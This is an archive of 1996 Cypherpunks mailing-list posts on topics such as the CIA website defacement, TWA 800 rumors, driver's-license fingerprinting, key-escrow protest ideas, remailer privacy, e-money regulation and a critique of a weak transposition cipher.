On Fri, 20 Sep 1996, Skeeve Stevens wrote:
> Did you or anyone get a mirror of the site?! I wanna set one up! ;)

Check out http://titus.is.co.za/mikev/cia_hack

Later
Mike
____________________________________________________________________
I'm sure we will find out in a few years that Microsoft invented the Net. Or brought it to the masses. Or saved it from a certain and early demise. Or all of the above.
JAMES SEYMOUR

From DMiskell at envirolink.org Thu Sep 19 12:31:50 1996
From: DMiskell at envirolink.org (Daniel Christopher Miskell)
Date: Fri, 20 Sep 1996 03:31:50 +0800
Subject: All Bets Off
Message-ID:

>On Tue, 17 Sep 1996, Jeff Davis wrote:
>
>> > Just so this isn't hanging in cyberspace forever, my $5,000 bet for
>> > anyone to prove the TWA 800 flight was downed by a U.S. missile is now
>> > *off the table*.
>>
>> I heard through the family grapevine that they have pictures of a Stinger
>> taking out the plane they're analyzing in the Pentagon. There are 220+
>> Stingers *missing* in the US, so its not like they have to smuggle them
>> in... (That's not proof by any means, but *my* family grapevine has always
>> been very reliable. The cousin who told me this has a Dad who flew as
>> the intelligence officer observer on Bronco flights out of Quang Tri for
>> 18 months, rotating out just before the base was over run in May of '72.)
>
>Does this cousin also have an aunt who lived next door to Joe Montana's
>babysitter? I might know his father ...
>
>Ask your family grapevine about the stinger's op altitude, and the
>altitude of the TWA when it broke up - I don't have Jane's lying around,
>but it seems that the TWA plane was a tad bit high for a stinger.
>
>- r.w.

I recall that Tom Clancy, who has written a number of military fiction novels, for which he has done endless notebooks full of research for, made a statement about this. He said, simply, that the TWA jet's explosion was at such an altitude, that even if someone did it from a boat directly under, it was still far too high for a Stinger missile to reach, much less damage.
Just thought I would throw that out there. Tom Clancy is not a military-hired brain, but to make his novels realistic and to do justice to the people he portrays, he does a LOT of research. He is a highly respected author, and I have no doubt that his statement is based on his personal findings, collected for a previous novel. -- If in fact we are the only intelligent life on this planet, why the fuck are we in this goddamn mess? -- Find my public key on the World Wide Web -- point your browser at: http://bs.mit.edu:8001/pks-toplev.html From ericm at lne.com Thu Sep 19 13:12:47 1996 From: ericm at lne.com (Eric Murray) Date: Fri, 20 Sep 1996 04:12:47 +0800 Subject: CIA web site hacked Message-ID: <199609191557.IAA06913@slack.lne.com> Chain: 2 Mike van der Merwe writes: > > > Hi everybody > > Heh! This one's good for a laugh :-)) > > http://www.odci.gov/cia > > Seems the DOJ hack was a good inspiration. Heh! Life's good when you're > willing to work at it. www.odci.gov appears to have been shut down (as of 11:50am EDT). Did anyone make a copy of the hacked pages? From DMiskell at envirolink.org Thu Sep 19 13:37:04 1996 From: DMiskell at envirolink.org (Daniel Christopher Miskell) Date: Fri, 20 Sep 1996 04:37:04 +0800 Subject: A daily warning regarding Timothy C. May Message-ID: >Daniel Christopher Miskell wrote: >> Timothy C. May is a lying sack of shit. >> Right. And you had to insult him through use of anonymous mail. Boy, >> you're real brave, shedding the light to the rest of the cypherworld >> in such a manner. >> Apologies for the spam, but there was no address, obviously. >> If in fact we are the only intelligent life on this planet, why the >> fuck are we in this goddamn mess? > >A. There's probably no intelligent life in the (this) universe, and the > Uncertainty Principle is probably wrong, too (i.e., there is really > no Free Will, so there are no valid answers either), -and- > >B. If you were truly intelligent, would you want to come here? 
I find the lack of separators between what anon wrote, what I wrote, and what my sig said amusing.

Well, I get the feeling that I am intelligent. I tested for acceptance into Mensa, and after finding out my IQ was 156, I felt I had better things to do than include myself with the 'intelligence elite'. This list is a cool spot. I find out a lot of things I didn't know about, and hear a lot of things that the media isn't going to cover, things called 'rumor' because they don't want them to be true. Who knows, maybe we are all dumb. Either way, it does no good to lament whether or not we have sufficient intelligence to be referred to as 'intelligent life.' Personally, I find that it is far more fun to keep on trucking with life, rather than debate a moot point that we have no control over.

--
If in fact we are the only intelligent life on this planet, why the fuck are we in this goddamn mess?
--
Find my public key on the World Wide Web -- point your browser at:
http://bs.mit.edu:8001/pks-toplev.html

From skeeve at skeeve.net Thu Sep 19 13:42:27 1996
From: skeeve at skeeve.net (Skeeve Stevens)
Date: Fri, 20 Sep 1996 04:42:27 +0800
Subject: CIA hacked
In-Reply-To:
Message-ID: <199609191540.BAA24455@myinternet.myinternet.net>

You, Mike van der Merwe, shaped the electrons to say:
+
+
+On Fri, 20 Sep 1996, Skeeve Stevens wrote:
+
+Check out http://titus.is.co.za/mikev/cia_hack

Thanx...
An Australian Mirror of the site is up on http://www.skeeve.net/cia/ the doj mirror is http://www.skeeve.net/doj/ -------------------------------------------------------------------- Skeeve Stevens Email: skeeve at skeeve.net CEO/The Big Boss/All round nice guy URL: http://www.skeeve.net/ MyInternet Australian Anglicans Online http://www.myinternet.net/ http://www.anglican.asn.au/ Phone: (+612) 869-3334 Mobile: (0414) SKEEVE [+61414-753-383] Key fingerprint = D2 7E 91 53 19 FE D0 5C DE 34 EA AF 7A 5C 4D 3E From wombat at mcfeely.bsfs.org Thu Sep 19 13:53:04 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Fri, 20 Sep 1996 04:53:04 +0800 Subject: A Bizarre Increase in the Ad Hominems Here In-Reply-To: <3240C258.3464@gte.net> Message-ID: > > Pardon me for butting in, but "nutcase and liar" are some pretty > significant slurs, moreso than "putz" or "bozo" or whatever. I'd say > there's gotta be a helluva story here. Background, anyone? > Don't go there, Dave. ;) Just stay home and watch some soaps, and spare us the agony ... Consider this a plea, rather than an attempt at censorship :) - r.w. From tcmay at got.net Thu Sep 19 14:02:44 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 20 Sep 1996 05:02:44 +0800 Subject: DL in exchange for fingerprint Message-ID: At 12:23 PM 9/19/96, Jeff Barber wrote: >Oh joy. You no longer need to be arrested to get fingerprinted >in Georgia. On the front page of Wednesday's Atlanta Journal, under >the headline "Now you can get driver's license in minutes": ... >Just what I would have called it: a great idea. Is it true that 31 >other states take your fingerprint as part of the license application? >I feel sick. California has it, so that's what about 20 million drivers have to put up with. I'd expect all the states to have this within a few years. (Yes, I disliked being thumb-printed, but I could see no viable alternative. 
I'm sure Duncan has some scheme to declare himself a Botswanan exchange student, but I decided being thumb-printed was the lesser hassle.) By the way, the next rev of the California driver's license will reportedly have one's *Social Security Number* printed on the card! So much for the statement clearly printed on my card: "For social security and tax purposes -- not for identification." Paraphrasing that famous quote, just which part of "not for identification" don't they understand? (Indeed, I am asked for my SSN in many places. A few times I've refused to give it. Once the clerk just said, "Fine, I have it here on my computer anyway." Refusing to give it is probably no longer meaningful, due to massively cross-linked data bases.) Again, we desperately need an infrastructure of "credentials without identity." --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From sunder at brainlink.com Thu Sep 19 14:16:28 1996 From: sunder at brainlink.com (Ray Arachelian) Date: Fri, 20 Sep 1996 05:16:28 +0800 Subject: cypherpunk listserve usefulness In-Reply-To: <199609181601.JAA28161@slack.lne.com> Message-ID: On Wed, 18 Sep 1996, Eric Murray wrote: > No, filtering your mail does NOT make you a censor, unless you're > filtering the mail before it is gatewayed to a list or newsgroup > where other people read it. And they didn't ask you to do the filtering. Yep, matter of fact that's what the light versions of cpunx are for. 
's matter of fact I happen to run one of them and my subscribers are happier without all the noise and flames here. :) as for me, I don't mind the noise or the flames, I tend to hit the "D" key quite often. :) ( to subscribe to it, send a message to my address with the >SUBJECT< "fcpunx subscribe" or "fcpunx help" for help.) > Filtering your own mail is akin to choosing which articles > in a magazine to read. It's not censorship if you don't > read an article; it's the article's author's fault that > he didn't make the article interesting enough for you to read. Yep. > I think that anyone who has to work for a living must filter > the cypherpunks list in order to cut out some of the crap. > Most people just don't have the time to wade through everything, and > filtering some of it out is a good start on upping the S/N ratio. > What you consider Signal and Noise however is entirely up to you. Especially since Cypherpunks isn't the only list I subscribe to. I go through about 200-300 messages a day, and 80% of them get delted without a single look. I tend to read the 1st few messages of a topic, and if it's noise, it gets axed. :) ============================================================================= + ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\== \|/ |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\= <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/= /|\ | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/== + v + | Janet Reno & GAK |AK| do you not understand? |======= ===================http://www.brainlink.org/~sunder/========================= ActiveX! ActiveX! Format Hard drive? Just say yes! From batman at infomaniak.ch Thu Sep 19 14:33:04 1996 From: batman at infomaniak.ch (Batman) Date: Fri, 20 Sep 1996 05:33:04 +0800 Subject: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal Building In-Reply-To: <9609191046.ZM9184@ws232034> Message-ID: On Thu, 19 Sep 1996, James P. 
O'Shea III wrote: > On Sep 19, 9:24am, Batman wrote: > > Subject: RE: Bernstein hearing reminder: THIS Friday 11:45AM, SF > Federal B > >For the 200th time, unsubscrive me of your fucked mail lists. > > > >-- End of excerpt from Batman > > > > Apologies if you receive more than one copy of this message, but I'm > auto-replying to your message to handle the flood: > > Redistribution to the list from which you originally received the > problem > message is kindly requested. > > > Thank you for bringing this matter to our attention. The email or > posting you have seen falsely represents Smith Barney and its > employees. These are erroneous postings that did not originate from > anyone employed by our firm, and therefore we cannot directly stop > them from occurring. However we have advised the companies we > believe > to have serviced the originator of these messages and we are > pursuing > all possible steps to end this fraud. Unfortunately some people > abuse > the Internet and we regret any inconvenience they may have caused > you. > > There are currently no mailing lists maintained in the smb.com > domain, > so you were not subscribed to any list. If you receive any further > messages of this nature, they are the product of the same spurious > source. > > We're sorry for any inconvenience you may have experienced as a > result > of this unfortunate abuse of the 'Net. > > Further queries via email to postmaster at smb.com please. > > Thanks. > -James > postmaster, network security, etc. > > ----------------------- > James P. O'Shea III > Smith Barney Inc. > postmaster at smb.com > > > -- > > ---------------------------->>>>Note NEW PAGER numbers 6/27/96 > James P. O'Shea III 212-723-5885 (voice) > Systems Administrator 212-723-5021 (fax) > Smith Barney Inc. > 390 Greenwich/6 West 800-225-0256 PIN 306296 (alpha page) > jposhea3 at panix.com 917-820-5855 (digital page) > james_oshea at smb.com > > > Dear Sir, I thank you for your e-mail. 
This has began 6 months ago, when a guy has started to subscrive me on several lists and i got 300 mails/day. this guy is sricca at worldcom.ch, he's only 15 years old and i've noticed several complains here in Switzerland for him. I sent a mail to his admin root at wolrdcom.ch, but i think they must be good friends, as i never received a reply from him. What i can do is to ask the mail-list admins to not let him subscribe me again. I don't understand, a mail-list as cypherpunhks where people talk about security, and if i want, i can subscrive in there all the e-mails i want :( couldn't you resolve this problem to be sure that i will no more talk about fucked mail-lists ? It would be so great, so fantastic to forget cypherpunk mail list (and the others) as soon as possible. Please, do something. Kind regards, Joao Bento Joao.Bento at cern.ch http://nicewww.cern.ch/~jbe From weber at iez.com Thu Sep 19 14:53:09 1996 From: weber at iez.com (Rolf Weber) Date: Fri, 20 Sep 1996 05:53:09 +0800 Subject: GLOBAL ALERT: GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITES In-Reply-To: <9609191310.AA11909@spibm02> Message-ID: <9609191644.AA15421@spibm02> > > it was *not* the german government, it was the public prosecutor > general, who pushed this blockage. > i got a lot of replies to this. :-) i did translate "government" word for word, but it's written more in the meaning of "state". and in this meaning, it's surely the right word. sincerely, rolf From stewarts at ix.netcom.com Thu Sep 19 15:02:04 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Fri, 20 Sep 1996 06:02:04 +0800 Subject: DL in exchange for fingerprint Message-ID: <199609191845.OAA02427@attrh1.attrh.att.com> > "We keep a memory bank that matches your fingerprints with your > license," [DoPS spokesman] said. "In other words, if you went to > get a new license with a false birth certificate and your > fingerprint didn't match the name, you wouldn't get a license. 
Totally bogus - _my_ birth certificate didn't have my fingerprints on it :-) Now, it may help stop people from getting duplicate licenses, assuming they use the same finger each time and don't have the sense to put rubber cement or ridge filler or something on their fingers first (and assuming, of course, that the system actually _checks_ the fingerprint in real time, rather than just recording it.)

>Just what I would have called it: a great idea. Is it true that 31
>other states take your fingerprint as part of the license application?
>I feel sick.

Wouldn't be surprising; you didn't think you lived in America, did you?

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From EALLENSMITH at ocelot.Rutgers.EDU Thu Sep 19 15:03:18 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith)
Date: Fri, 20 Sep 1996 06:03:18 +0800
Subject: Workers Paradise. /Political rant.
Message-ID: <01I9NVPGAM908Y4ZFH@mbcl.rutgers.edu>

From: IN%"jbugden at smtplink.alis.ca" 17-SEP-1996 01:09:37.71

Mind trying to do 72-column or so formatting, BTW?

>Canada has a single payer system and we spend about two thirds as much as the
>U.S. on health care as a percentage of G.N.P. We manage to insure all Canadians
>while about 35% of people in the U.S. have *no* health insurance.

Canada also has less smoking, teenage pregnancy, and various other factors which are known to raise health insurance costs. I've seen some studies in which these _entirely_ account for the differences... and keep in mind the rate of health care inflation of the two countries (depending on the study, either the same or higher for Canada.)

-Allen

From EALLENSMITH at ocelot.Rutgers.EDU Thu Sep 19 15:19:19 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E.
Allen Smith)
Date: Fri, 20 Sep 1996 06:19:19 +0800
Subject: Judge Kozinski Responds
Message-ID: <01I9NW5EG7388Y4ZFH@mbcl.rutgers.edu>

From: IN%"liberty at gate.net" "Jim Ray" 17-SEP-1996 02:14:28.24
To: IN%"cypherpunks at toad.com"
CC:
Subj: Judge Kozinski Responds

>The statement about anonymous remailers was largely
>accurate. I'm not sure that the fact that you (or some of
>your associates) are willing to block people from getting
>anonymous mail is a sufficient safeguard. Some may not be,
>and it only takes one or two who do not adhere to the code
>to make life miserable for the rest of us.
>
>We agree about the need for privacy, but I'm not at all sure
>why the right to send messages anonymously trumps the
>recipient's right to know who's addressing him. Getting an
>anonymous message--even one that is not harassing or
>threatening--is an invasion of my privacy. As for

The essential problem with this viewpoint is that the right the receiver has is to ignore the message. If he doesn't want to receive anonymous messages, he should set up a mail filtration program that will do a good enough job of filtering them out. Spammed messages can be countered with Internet charging (necessary anyway for the long-term health of the Net), as can mailbombing. That leaves individual messages that may be offensive (including, apparently in his case, offensive by virtue of being anonymous), but if offensiveness meant someone should have the right to stop the emission of speech, that would mean the Christian Coalition would have the right to stop speech on evolution, the PC types would have the right to stop speech on genetic differences in intelligence (see Stephen Jay Gould for them on this issue - even leaving aside racial questions which are separate from the individual ones), etcetera.
-Allen

From sunder at brainlink.com Thu Sep 19 15:27:00 1996
From: sunder at brainlink.com (Ray Arachelian)
Date: Fri, 20 Sep 1996 06:27:00 +0800
Subject: monkey-wrenching GAK
In-Reply-To: <199609182148.WAA00346@server.test.net>
Message-ID:

On Wed, 18 Sep 1996, Adam Back wrote:

> 3) Monkey-wrenching
>
> Even with GAK, where you are forced to give the government the keys,
> you can do much to make the job of administering GAK very expensive.
> You start by ensuring that the government can not get your encrypted
> data (the other half of the secret share), so that the key is of no
> use :-)

Another thing you can do: generate huge key pairs all day long and submit them to the NSA. If enough people do this, they will be flooded and overworked, of course they may ignore them, etc, or make it hard to do so, but if everyone generates a 4K key every hour or two and discards it, but gives the key pair to the NSA anyway, they will run out of storage space, or at least it will make it much much harder for them to figure out which key you are using for conversation X.

You can also generate a lot of /dev/null traffic by sending encrypted random garbage through remailers signed and encrypted with those random discard keys - apparently to yourself - but instruct the xth remailer in the chain to just drop it. Make it hard for them to know which of your 10000 keys is the one you truly use. :)

This assumes many many things: like you are allowed to generate your own key, you are allowed to make the submissions electronically to the NSA, etc, so caveat emptors are all over the place here. :) Still, it's one suggestion.
============================================================================= + ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\== \|/ |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\= <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/= /|\ | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/== + v + | Janet Reno & GAK |AK| do you not understand? |======= ===================http://www.brainlink.org/~sunder/========================= ActiveX! ActiveX! Format Hard drive? Just say yes! From minow at apple.com Thu Sep 19 15:38:21 1996 From: minow at apple.com (Martin Minow) Date: Fri, 20 Sep 1996 06:38:21 +0800 Subject: GAK, GAP, GAY In-Reply-To: <199609190117.SAA04924@netcom21.netcom.com> Message-ID: > (The Swedish Post is currently >spending a lot of money advertising their new Web services. For >full access to such sensitive data as detailed wheather maps you >have to enter your name, address and Person Number - for credit >information, they say - and they will send you, by snail mail, a >username and password; http://www.torget.se) Actually, they say they'll send it by Registered Mail - so there is an "authenticated" binding between userID and person. (MIT did this for accounts on MIT-AI about 20 years ago.) They will also send a copy of your Swedish credit report. Since the Swedish Post is planning to get into offering services for a fee, their requirement for a means of payment seems reasonable, though I would have thought that a Visa number would be sufficient. They refused my application without sending a copy of my credit report (and without explanation), even though I provided them with my valid Swedish personal number. I may complain in person next week when I'm in Stockholm for vacation, though it seems like a dumb way to spend a vacation. Martin. From EALLENSMITH at ocelot.Rutgers.EDU Thu Sep 19 15:45:09 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. 
Allen Smith) Date: Fri, 20 Sep 1996 06:45:09 +0800 Subject: More proposals for European censorship Message-ID: <01I9O2D1BGCO8Y4ZFQ@mbcl.rutgers.edu> Fortunately, the European Parliament really doesn't have much power. I'd point out to those squeamish about child pornography that - aside from that it's the production that's the problem, not the transmission & duplication - what can be used to censor it can be used to censor everything else. Incidentally, what nonsense is meant by "social rights"? -Allen > _________________________________________________________________ > webslingerZ > _________________________________________________________________ > EU PARLIAMENT DEMANDS ACTION ON CHILD SEX > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 Reuter Information Service > STRASBOURG, France (Sep 19, 1996 11:24 a.m. EDT) - The European > Parliament pressed the European Union on Thursday to act to curb child > sex and trafficking rings, saying the fight against sexual abuse of > children must be an "absolute priority." [...] > Euro-MPs also called for action to stop criminals using the Internet > to disseminate pornography and to deal in women and children. They > urged the European Commission to look into technical and legal > measures, at European and global level, to combat the use of the > information superhighway for criminal purposes. > They said a strong regulatory framework for controlling the networks > was needed to ensure that people's personal and social rights were > enhanced by the advent of the new technology. [...] > Copyright © 1996 Nando.net From Mullen.Patrick at mail.ndhm.gtegsc.com Thu Sep 19 15:49:14 1996 From: Mullen.Patrick at mail.ndhm.gtegsc.com (Mullen Patrick) Date: Fri, 20 Sep 1996 06:49:14 +0800 Subject: Stego inside encryption Message-ID: My apologies if this shows up twice. I got an error message from my first posting. 
***************

I know a lot of times the idea behind steganography is to hide the fact that a secret message is in a seemingly normal file/mail/whatever. This is good for avoiding unwanted interest in your file. The benefit of not having people attempt to crack your code, added to the strength of the cryptosystem is wonderful.

However, I propose this-- Don't hide that anything's encrypted! Rather than hide this fact, throw it in their face! I propose hiding an encrypted message inside another encrypted message. Set bits in specific places to data in the real message. The benefit is Oscar not only doesn't know what the crypto is, he attacks the wrong message. Hiding statistically random bits from the true message in statistically random bits from the masking message shouldn't be too hard.

Granted, this scheme doesn't get you past measures designed to keep out all encrypted messages, and it surely wouldn't keep your message from generating interest, but it would be very hard to decrypt the message, especially when some algorithm is used which (seemingly) randomly selects which bits to use for the stego.

Just a thought... My apologies if someone has already proposed this method.

Patrick

From perry at piermont.com Thu Sep 19 15:51:33 1996
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 20 Sep 1996 06:51:33 +0800
Subject: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal Building
In-Reply-To: <01BBA60C.5AD5CCC0@misd145.cern.ch>
Message-ID: <199609191753.NAA21446@jekyll.piermont.com>

Batman writes:
> For the 200th time, unsubscrive me of your fucked mail lists.

Never. I will *never* unsubscrive you from anything.

From bkmarsh at feist.com Thu Sep 19 15:54:07 1996
From: bkmarsh at feist.com (Bruce M.)
Date: Fri, 20 Sep 1996 06:54:07 +0800
Subject: your mail
In-Reply-To: <199609191230.FAA09141@sirius.infonex.com>
Message-ID:

On Thu, 19 Sep 1996, Mixmaster wrote:

> "Drivers Must Allow Fingerprinting"
> "'I have grave concerns,' she said.
'When we think of giving a fingerprint, > we think of being arrested. We feel like we've done something wrong, > not because we are complying with the law and are doing something > right.' > "There will be no exceptions to the fingerprint requirement..., Wright said, > adding that 'having a driver's license is a privilege,' not a right. I always find it ironic when government representatives such as this individual feel that they can put on an air of superiority by saying that we, the public, are privledged to be able to do something at all. Apparently they forget that not only are we the reason they have a job, but we're the reason for government, period. > "Wright said...the fingerprints eventually will be available to other law > enforcement agencies and courts.... Of course! Along with our escrowed encryption keys and 'classified' dossiers. ________________________________ [ Bruce M. - Feist Systems, Inc. ] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 'DISA information shows that computer attacks on the Department of Defense are successful 65 percent of the time. The DoD, despite its problems, probably has one of the strongest computer security programs in government.' -GAO/T-AIMD-96-108 From attila at primenet.com Thu Sep 19 15:57:08 1996 From: attila at primenet.com (attila) Date: Fri, 20 Sep 1996 06:57:08 +0800 Subject: The periodic caveat about Timmy May In-Reply-To: <199609190517.HAA00851@basement.replay.com> Message-ID: <199609191920.NAA00823@InfoWest.COM> In <199609190517.HAA00851 at basement.replay.com>, on 09/19/96 at 07:17 AM, nobody at flame.alias.net (Anonymous) said: Timmy May habitually digs into his cesspool of a mind for his mailing list fertilizer. this is humour. it tickles the imagination, and the reference to tim is lost! From perry at piermont.com Thu Sep 19 16:05:30 1996 From: perry at piermont.com (Perry E. 
Metzger) Date: Fri, 20 Sep 1996 07:05:30 +0800 Subject: unscribe cypherpunks@toad.com In-Reply-To: Message-ID: <199609191939.PAA21770@jekyll.piermont.com> Steve Dyson writes: > unscribe cypherpunks at toad.com Never. From perry at piermont.com Thu Sep 19 16:29:52 1996 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 20 Sep 1996 07:29:52 +0800 Subject: Cypherpunks is dead anyway... (was Cypherpunk Enquirer) In-Reply-To: <199609190441.AAA12078@dhp.com> Message-ID: <199609191739.NAA21396@jekyll.piermont.com> The Enquirer wrote... > Scientists flocked to toad.com recently in response to the first > authenticated sighting of a Perrygram in months. The Perrygram, > only recently thought extinct, was spotted on the cypherpunks > mailing list after an absence of several months. Specialists > speculate that it may have detected the recent list increase in its > favorite food - pure, unadulterated bullshit. In fact, Perrygrams are dead because I've given up on this list. There is no more cryptography discussion going on -- the list is basically a very low grade political rant forum, with most of the rants having no relevance to crypto. (I suppose "I told you so" doesn't help much.) Anyway, as soon as I find a home for Cypherpunks Mark II I'm starting it and unsubscribing from here. Cypherpunks is dead. This happens to all mailing lists eventually. I suppose it had to happen here. (Finding a new list home has been a low priority project for me recently because I've been busy with "real work" -- however, if you run (I emphasize *run*) a well connected site and can handle a list with 1500 subscribers or so, and don't mind a somewhat more restrictive charter than "post anything you like at any time", please get in touch.) Perry From markm at voicenet.com Thu Sep 19 16:31:18 1996 From: markm at voicenet.com (Mark M.) 
Date: Fri, 20 Sep 1996 07:31:18 +0800
Subject: a simple cypher scheme
In-Reply-To: <9609180005.AA14720@ns.tsinet.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 17 Sep 1996, stuart johnson wrote:

> i've been on cypherpunks for about a year and a half now, and have watched
> many interesting threads pass by but i've never posited anything. what has
> brought me out into the open is this : i work for an engineering firm doing
> asic design, i use pgp ( as do all rational persons ), a co-worker here has
> come up with a 'cypher' scheme that he would like to use to send code to our
> clients. the scheme is this : he would take the file of code and pad all
> lines to the length of the longest line, he would then perform column swaps,
> and then row swaps, to 'mix up' the file. the person receiving the file
> would then perform the opposite functions to recover the file. it seems so
> simple that it can't be good. i've convinced him to use pgp, but i would
> like some input if possible on why his cypher scheme is not a good one.

This is a transposition cipher. The problem with this cipher is that it does not obscure patterns in the plaintext. There is no substitution function in this algorithm. Secure ciphers have several rounds with both a substitution and transposition function. In other words, there is no way this could be secure. Tell your co-worker to stick with triple-DES.

- -- Mark
PGP encrypted mail preferred.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ From EALLENSMITH at ocelot.Rutgers.EDU Thu Sep 19 16:32:35 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Fri, 20 Sep 1996 07:32:35 +0800 Subject: Comments on Emoney regulation Message-ID: <01I9O251UAWK8Y4ZFQ@mbcl.rutgers.edu> JYA has the complete version of this, but I wanted to make a comment that this allegedly pro-consumer group is wanting mandatory receipts - decidedly anti-privacy. Typical; Consumer Reports keeps calling for limits on what can be made available instead of making the information available and letting people decide on their own. There is also the problems associated with welfare-on-a-card - namely limits on what can be purchased, a requirement for full identity disclosures, etcetera. I'd call this effort by government also a form of the pressure-by-economics we saw with the initial Clipper proposal (leaving aside the actual agenda), namely using government purchasing to distort the market (away from anonymous digital cash, in this case). The last statement also brings up the question of why shouldn't banks move out of high-crime areas? I'd appreciate lower bank fees, and so would most people.
-Allen > _________________________________________________________________ > Centura > _________________________________________________________________ > REGULATORS TURN SPOTLIGHT ON CYBERMONEY > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 N.Y. Times News Service > (Sep 19, 1996 00:41 a.m. EDT) -- As concerns grow about electronic > money-laundering, cybercounterfeiting and bank runs on the Internet, > regulators in the United States and around the world are scurrying to > catch up with the rapid development of electronic money. [...] > Moreover, there is now no requirement that a company that issues > stored-value cards must be a bank or be regulated in any other way. > That raises the question whether these cards, if they become popular, > will become as unruly as the market for prepaid telephone cards, in > which a number of card vendors have failed to deliver the calls that > were promised. [...] > To prevent such problems, a number of other countries have decided to > require that stored-value cards be issued only by banks. > The Federal Reserve has issued proposals on whether the consumer > protections guaranteed for other electronic-funds transfers -- like > direct deposits and debit cards -- will apply to stored-value card > purchases. These protections include the requirement of receipts with > every purchase and a limit on liability if a card is lost or stolen. > The Fed has proposed that card systems that cannot hold more than $100 > and those that have no central records of how much money is on each > card be exempt from the strict consumer-protection rules. > "The Fed proposal is destroying consumer protection," said Janice > Shields, the consumer-research director for the U.S. Public Interest > Research Group in Washington. "They don't want to disclose > error-resolution procedures, and they want unlimited consumer losses." [...] 
> One force pushing the development of the technology, however, is the > government itself, which has mandated that by 1999 all payments to or > from government accounts must be made electronically. This may have > the most significant effect on the recipients of various welfare > programs, many of whom now do not have bank accounts that could > receive an electronic money transfer. > To deal with this, various groups of state governments are developing > special cards on which benefits payments will be stored. Recipients > will be able to use the cards to withdraw cash at automated teller > machines and to make purchases. > One of the thorniest issues is whether holders of these welfare cards > get the same protections as holders of credit and debit cards issued > by banks. State and local governments do not want to absorb the cost > of issuing refunds, for example, though some readings of the > electronic funds transfer act would require that they do. > Some are also concerned that as banks move more toward offering their > services electronically, they will have more reason to close branches > in inner-city areas. [...] > Copyright © 1996 Nando.net From EALLENSMITH at ocelot.Rutgers.EDU Thu Sep 19 16:33:25 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Fri, 20 Sep 1996 07:33:25 +0800 Subject: Insider Trading - news report Message-ID: <01I9O2JCWXMK8Y4ZFQ@mbcl.rutgers.edu> I'd be curious as to the comments of Black Unicorn and others on that legal finding - it does appear to make things at least a bit better in this area... including making it difficult to claim that insider information shouldn't be transmitted on the Net. Incidentally, I find AP's calling insider trading "fraud" rather biased. 
-Allen > _________________________________________________________________ > Direct Media > _________________________________________________________________ > INSIDER TRADING NEVER WENT AWAY > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 The Associated Press > WASHINGTON (Sep 18, 1996 10:35 a.m. EDT) -- One of the most infamous > acts in the financial fraudster's playbook, insider trading, remains > at record levels, despite a decade of steady crackdowns by regulators. [...] > The SEC brought one of its more unusual insider trading cases on > Monday, when it sued the unnamed account holders in a Swiss and > Bahamian accounts with insider trading ahead of The Gillette Co.'s > merger proposal for Duracell International. [...] > One disturbing development for regulators is a recent decision by the > 8th U.S. Circuit Court of Appeals that struck down one of the SEC's > main enforcement tools in insider trading cases. > The court, which covers several Midwestern states, rejected the > so-called "misappropriation theory" in insider trading cases, which is > used to nab people trading on inside information who don't owe a > fiduciary duty to the company's shareholders. The court also rejected > an SEC rule used to snare insider trading in tender offers. > The 8th Circuit decision came in August in a Justice Department case > against Minneapolis attorney James H. O'Hagan, who was charged with > insider trading during the 1988 takeover bid of Pillsbury Co. by Grand > Metropolitan PLC. SEC General Counsel Richard Walker has asked the > appeals court for a rehearing on the matter. > While the 8th Circuit decision represents a setback for the SEC, the > agency usually brings its cases in the New York and Chicago areas, > where the federal courts acknowledge these insider trading rules. > Regulators say these enforcement tools are important because insider > trading follows few patterns.
In an analysis of 35 cases brought in > 1995 that solely dealt with insider trading, Gerlach said 20 involved > trading ahead of mergers, three ahead of other positive corporate > announcements and six ahead of bad corporate news. > He described 16 of the cases as "classic insider trading" involving an > executive, company director or employee who traded on confidential, > market sensitive information or tipped friends about it. Among the > remaining cases, four involved trading by securities brokers or other > industry officials, four involved law firm employees and one, an > employee at an outside accounting firm. > Investigators at the Nasdaq Stock Market's market surveillance unit > refer a significant number of insider trading cases to the SEC. Halley > Milligan, who heads a team of nine insider trading investigators at > Nasdaq, said the market has made 73 referrals on suspected insider > trading to the SEC so far in 1996, which is on par with last year, > when 107 cases were referred to the agency. > Nasdaq, like major stock markets, uses sophisticated computer > technology to sniff out illegal trading. The Nasdaq system is called > SWAT, or Stock Watch Automatic Tracking, which scans news databases > after detecting any unusual trading. [...] > Copyright © 1996 Nando.net From chaos 